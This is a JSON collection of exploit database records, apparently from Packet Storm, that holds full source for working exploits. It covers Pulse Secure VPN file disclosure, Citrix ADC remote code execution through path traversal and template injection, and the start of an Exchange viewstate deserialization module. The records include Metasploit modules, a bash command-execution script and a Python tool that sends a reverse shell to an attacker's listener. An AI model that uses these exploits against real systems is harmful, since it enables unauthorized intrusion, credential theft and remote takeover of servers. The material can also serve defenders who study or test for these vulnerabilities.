"href": "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html", "title": "Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure", "type": "packetstorm", "sourceData": "`# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: 8/20/2019 \n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera \n# Vendor Homepage: https://pulsesecure.net \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: Linux \n# CVE : CVE-2019-11510 \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pulse Secure - System file leak', \n'Description' => %q{ \nPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. \nThis exploit reads /etc/passwd as a proof of concept \nThis vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] \n], \n'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ooof, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154176/pulsesecure-disclose.rb.txt"}, {"lastseen": "2020-01-14T23:23:57", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-14T00:00:00", "published": "2020-01-14T00:00:00", "id": "PACKETSTORM:155947", "href": "https://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "title": "Citrix ADC (NetScaler) Directory Traversal / Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka \nNetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload. \n}, \n'Author' => [ \n'Project Zero India', 'TrustedSec', # PoCs \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module (https://www.pirates.re/) \n], \n'References' => [ \n['CVE', '2019-19781'], \n['EDB', '47901'], \n['EDB', '47902'], \n['URL', 'https://support.citrix.com/article/CTX267027/'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => false, \n'Targets' => [ \n['Python', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON, \n'Type' => :python, \n'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'} \n], \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal', \n'HttpClientTimeout' => 3.5 \n}, \n'Notes' => { \n'AKA' => ['Shitrix'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef exploit \nunless datastore['ForceExploit'] \ncase check \nwhen CheckCode::Vulnerable \nprint_good('The target appears to be vulnerable') \nwhen CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable') \nelse \nfail_with(Failure::Unknown, 'The target vulnerability state is unknown') \nend \nend \n \nprint_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \ncase target['Type'] \nwhen :python \nexecute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\")) \nwhen :unix_command \nif (res = execute_command(payload.encoded)) && cmd_unix_generic? \nprint_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, '')) \nend \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nfilename = rand_text_alpha(8..42) \nnonce = rand_text_alpha(8..42) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'), \n'headers' => { \n'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\", \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => rand_text_alpha(8..42), \n'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\" \n} \n) \n \nunless res && res.code == 200 \nprint_error('No response to POST newbm.pl request') \nreturn \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"), \n'headers' => { \n'NSC_USER' => rand_text_alpha(8..42), \n'NSC_NONCE' => nonce \n}, \n'partial' => true \n) \n \nunless res && res.code == 200 \nprint_warning(\"No response to GET #{filename}.xml request\") \nend \n \nregister_files_for_cleanup( \n\"/netscaler/portal/templates/#{filename}.xml\", \n\"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\" \n) \n \nres \nend \n \ndef chr_payload(cmd) \ncmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.') \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155947/citrix_dir_traversal_rce.rb.txt"}, {"lastseen": "2020-01-13T22:40:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-13T00:00:00", "published": "2020-01-13T00:00:00", "id": "PACKETSTORM:155930", "href": "https://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "title": "Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC Remote Code Execution', \n'Description' => %q( \nAn issue was discovered in Citrix Application Delivery Controller (ADC) \nand Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n), \n'Author' => [ \n'RAMELLA S\u00e9bastien' # https://www.pirates.re/ \n], \n'References' => [ \n['CVE', '2019-19781'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], \n['EDB', '47901'], \n['EDB', '47902'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl meterpreter' \n} \n}, \n'Targets' => [ \n['Unix (remote shell)', \n'Type' => :cmd_shell, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (command-line)', \n'Type' => :cmd_generic, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptAddress.new('RHOST', [true, 'The target address']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \n \nderegister_options('RHOSTS') \nend \n \ndef execute_command(command, opts = {}) \nfilename = Rex::Text.rand_text_alpha(16) \nnonce = Rex::Text.rand_text_alpha(6) \n \nrequest = { \n'method' => 'POST', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), \n'headers' => { \n'NSC_USER' => '../../../netscaler/portal/templates/' + filename, \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => 'http://127.0.0.1', \n'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\", \n'desc' => 'desc', \n'UI_inuse' => 'RfWeb' \n}, \n'encode_params' => false \n} \n \nbegin \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \n \nif received.code == 200 \nvprint_status(\"#{received.get_html_document.text}\") \nsleep 2 \n \nrequest = { \n'method' => 'GET', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), \n'headers' => { \n'NSC_USER' => nonce, \n'NSC_NONCE' => nonce \n} \n} \n \n## Trigger to gain exploitation. \nbegin \nsend_request_cgi(request) \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \nreturn received \nend \n \nreturn false \nend \n \ndef get_chr_payload(command) \nchr_payload = command \ni = chr_payload.length \n \noutput = \"\" \nchr_payload.each_char do | c | \ni = i - 1 \noutput << \"chr(\" << c.ord.to_s << \")\" \nif i != 0 \noutput << \" . \" \nend \nend \n \nreturn output \nend \n \ndef check \nbegin \nreceived = send_request_cgi( \n\"method\" => \"GET\", \n\"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') \n) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \n \nif received && received.code != 200 \nreturn Exploit::CheckCode::Safe \nend \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nunless check.eql? Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nelse \nprint_good('The target appears to be vulnerable.') \nend \n \ncase target['Type'] \nwhen :cmd_generic \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nreceived = execute_command(payload.encoded) \nif (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\") \nprint_warning('Dumping command output in parsed http response') \nprint_good(\"#{received.get_html_document.text}\") \nelse \nprint_warning('Empty response, no command output') \nreturn \nend \n \nwhen :cmd_shell \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nexecute_command(payload.encoded) \nend \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155930/citrix-exec.rb.txt"}, {"lastseen": "2020-01-16T22:49:44", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "PACKETSTORM:155972", "href": "https://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html", "title": "Citrix ADC / Gateway Path Traversal", "type": "packetstorm", "sourceData": "`# Exploit Title: Path Traversal in Citrix Application Delivery Controller \n(ADC) and Gateway. \n# Date: 17-12-2019 \n# CVE: CVE-2019-19781 \n# Vulenrability: Path Traversal \n# Vulnerablity Discovery: Mikhail Klyuchnikov \n# Exploit Author: Dhiraj Mishra \n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 \n# Vendor Homepage: https://www.citrix.com/ \n# References: https://support.citrix.com/article/CTX267027 \n# https://github.com/nmap/nmap/pull/1893 \n \nlocal http = require \"http\" \nlocal stdnse = require \"stdnse\" \nlocal shortport = require \"shortport\" \nlocal table = require \"table\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \nlocal io = require \"io\" \n \ndescription = [[ \nThis NSE script checks whether the traget server is vulnerable to \nCVE-2019-19781 \n]] \n--- \n-- @usage \n-- nmap --script https-citrix-path-traversal -p <port> <host> \n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args \noutput='file.txt' \n-- @output \n-- PORT STATE SERVICE \n-- 443/tcp open http \n-- | CVE-2019-19781: \n-- | Host is vulnerable to CVE-2019-19781 \n-- @changelog \n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) \n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) \n-- @xmloutput \n-- <table key=\"NMAP-1\"> \n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem> \n-- <elem key=\"state\">VULNERABLE</elem> \n-- <table key=\"description\"> \n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, \n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path \n-- traversal vulnerability that allows attackers to read configurations or \nany other file. \n-- </table> \n-- <table key=\"dates\"> \n-- <table key=\"disclosure\"> \n-- <elem key=\"year\">2019</elem> \n-- <elem key=\"day\">17</elem> \n-- <elem key=\"month\">12</elem> \n-- </table> \n-- </table> \n-- <elem key=\"disclosure\">17-12-2019</elem> \n-- <table key=\"extra_info\"> \n-- </table> \n-- <table key=\"refs\"> \n-- <elem>https://support.citrix.com/article/CTX267027</elem> \n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> \n-- </table> \n-- </table> \n \nauthor = \"Dhiraj Mishra (@RandomDhiraj)\" \nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"discovery\", \"intrusive\",\"vuln\"} \n \nportrule = shortport.ssl \n \naction = function(host,port) \nlocal outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil \nlocal vuln = { \ntitle = 'Citrix ADC Path Traversal', \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, \n12.1, and 13.0 are vulnerable \nto a unauthenticated path traversal vulnerability that allows attackers to \nread configurations or any other file. \n]], \nreferences = { \n'https://support.citrix.com/article/CTX267027', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', \n}, \ndates = { \ndisclosure = {year = '2019', month = '12', day = '17'}, \n}, \n} \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal path = \"/vpn/../vpns/cfg/smb.conf\" \nlocal response \nlocal output = {} \nlocal success = \"Host is vulnerable to CVE-2019-19781\" \nlocal fail = \"Host is not vulnerable\" \nlocal match = \"[global]\" \nlocal credentials \nlocal citrixADC \nresponse = http.get(host, port.number, path) \n \nif not response.status then \nstdnse.print_debug(\"Request Failed\") \nreturn \nend \nif response.status == 200 then \nif string.match(response.body, match) then \nstdnse.print_debug(\"%s: %s GET %s - 200 OK\", \nSCRIPT_NAME,host.targetname or host.ip, path) \nvuln.state = vulns.STATE.VULN \ncitrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname \nor host.ip,port.number, path)) \nif outputFile then \ncredentials = response.body:gsub('%W','.') \nvuln.check_results = stdnse.format_output(true, citrixADC) \nvuln.extra_info = stdnse.format_output(true, \"Credentials are being \nstored in the output file\") \nfile = io.open(outputFile, \"a\") \nfile:write(credentials, \"\\n\") \nelse \nvuln.check_results = stdnse.format_output(true, citrixADC) \nend \nend \nelseif response.status == 403 then \nstdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname \nor host.ip, path, response.status) \nvuln.state = vulns.STATE.NOT_VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155972/cadcg-traversal.nse.txt"}, {"lastseen": "2020-01-13T22:40:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "PACKETSTORM:155904", "href": "https://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution", "type": "packetstorm", "sourceData": "`#!/bin/bash \n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 \n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' \n# Release Date : 11/01/2020 \n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia \necho \"================================================================================= \n___ _ _ ____ ___ _ _ \n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ \n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' | \n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_| \n|__/ CVE-2019-19781 \n=================================================================================\" \n############################## \nif [ -z \"$1\" ]; \nthen \necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n' \nexit; \nfi \nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); \ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is \necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \necho -ne \"Command Output :\\n\" \ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155904/citrixadcg-exec.txt"}, {"lastseen": "2020-01-13T22:40:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "PACKETSTORM:155905", "href": "https://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal", "type": "packetstorm", "sourceData": "`#!/usr/bin/python3 \n# \n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \n# \n# You only need a listener like netcat to catch the shell. \n# \n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White \n# \n# Tool Written by: Rob Simon and David Kennedy \n \nimport requests \nimport urllib3 \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings \nimport random \nimport string \nimport time \nfrom random import randint \nimport argparse \nimport sys \n \n# random string generator \ndef randomString(stringLength=10): \nletters = string.ascii_lowercase \nreturn ''.join(random.choice(letters) for i in range(stringLength)) \n \n# our random string for filename - will leave artifacts on system \nfilename = randomString() \nrandomuser = randomString() \n \n# generate random number for the nonce \nnonce = randint(5, 15) \n \n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script \n# note that the file location will be in /netscaler/portal/templates/filename.xml \ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): \n \n# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) \nencoded = \"\" \ni=0 \ntext = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport)) \nwhile i < len(text): \nencoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \" \ni += 1 \nencoded = encoded[:-3] \npayload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\" \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \ndata = ( \n{ \n\"url\" : \"127.0.0.1\", \n\"title\" : payload, \n\"desc\" : \"desc\", \n\"UI_inuse\" : \"a\" \n}) \n \nurl = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport)) \nrequests.post(url, data=data, headers=headers, verify=False) \n \n# this is our second stage that triggers the exploit for us \ndef stage2(filename, randomuser, nonce, victimip, victimport): \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '%s' % (randomuser), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \nrequests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False) \n \n \n# start our main code to execute \nprint(''' \n \n.o oOOOOOOOo OOOo \nOb.OOOOOOOo OOOo. oOOo. .adOOOOOOO \nOboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO \nOOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB' \n`O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo \n.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO \nOOOOO '\"OOOOOOOOOOOOOOOO\"` oOO \noOOOOOba. .adOOOOOOOOOOba .adOOOOo. \noOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO \nOOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO \n\"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\" \nY 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` \n: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . \n. oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo \n'%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO': \n`$\" `OOOO' `O\"Y ' `OOOO' o . \n. . OP\" : o . \n: \n \nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \nTool Written by: Rob Simon and Dave Kennedy \nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com \nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \n \nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used \nto append files in an XML format to the victim machine. This in turn allows for remote code execution. \n \nBe sure to cleanup these two file locations: \n/var/tmp/netscaler/portal/templates/ \n/netscaler/portal/templates/ \n \nUsage: \n \npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''') \n \n# parse our commands \nparser = argparse.ArgumentParser() \nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\") \nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\") \nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\") \nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\") \nargs = parser.parse_args() \nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\") \nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename)) \n# trigger our first post \nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) \nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\") \ntime.sleep(2) \nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\") \nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\") \nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\") \n# trigger our second post \nstage2(filename, randomuser, nonce, args.target, args.targetport) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155905/citrix-traversalexec.txt"}, {"lastseen": "2020-03-05T07:12:27", "bulletinFamily": "exploit", "description": "", "modified": "2020-03-04T00:00:00", "published": "2020-03-04T00:00:00", "id": "PACKETSTORM:156620", "href": "https://packetstormsecurity.com/files/156620/Exchange-Control-Panel-Viewstate-Deserialization.html", "title": "Exchange Control Panel Viewstate Deserialization", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'bindata' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# include Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nDEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27' \nVALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\" \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exchange Control Panel Viewstate Deserialization', \n'Description' => %q{ \nThis module exploits a .NET serialization vulnerability in the \nExchange Control Panel (ECP) web page. The vulnerability is due to \nMicrosoft Exchange Server not randomizing the keys on a \nper-installation basis resulting in them using the same validationKey \nand decryptionKey values. With knowledge of these, values an attacker \ncan craft a special viewstate to cause an OS command to be executed \nby NT_AUTHORITY\\SYSTEM using .NET deserialization. \n}, \n'Author' => 'Spencer McIntyre', \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0688'], \n['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'], \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows (x86)', { 'Arch' => ARCH_X86 } ], \n[ 'Windows (x64)', { 'Arch' => ARCH_X64 } ], \n[ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ] \n], \n'DefaultOptions' => \n{ \n'SSL' => true \n}, \n'DefaultTarget' => 1, \n'DisclosureDate' => '2020-02-11', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], 